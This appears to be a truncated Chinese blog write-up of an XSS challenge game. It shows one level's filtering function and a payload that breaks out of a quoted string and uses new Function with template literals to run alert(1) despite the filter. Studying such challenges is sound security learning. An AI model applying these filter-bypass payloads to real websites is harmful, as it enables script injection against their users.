本文详细解析了一系列XSS闯关游戏,包括利用单引号闭合语句、双引号绕过过滤、正则编码绕过、匿名函数与属性利用等技巧,逐步揭秘XSS漏洞挖掘的方法。
Well
题目源码
function escape(s) {
http://www.avlidienbrunn.se/xsschallenge/
s = s.replace(/[\r\n\u2028\u2029\\;,()\[\]<]/g, '');
return "<script> var email = '" + s + "'; <\/script>";
}源码分析
代码过滤了\r、\n、\u2028、\u2029、\、;、,、(、)、[、]和<。 单引号没被过滤,可以闭合前面的语句,通过定义函数来执行代码,在Payload中我们借助了new Function语法
解题过程
payload:
'+new Function `a${'alert'+String.fromCharCode`40`+1+String.fromCharCode`41`}`+'
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
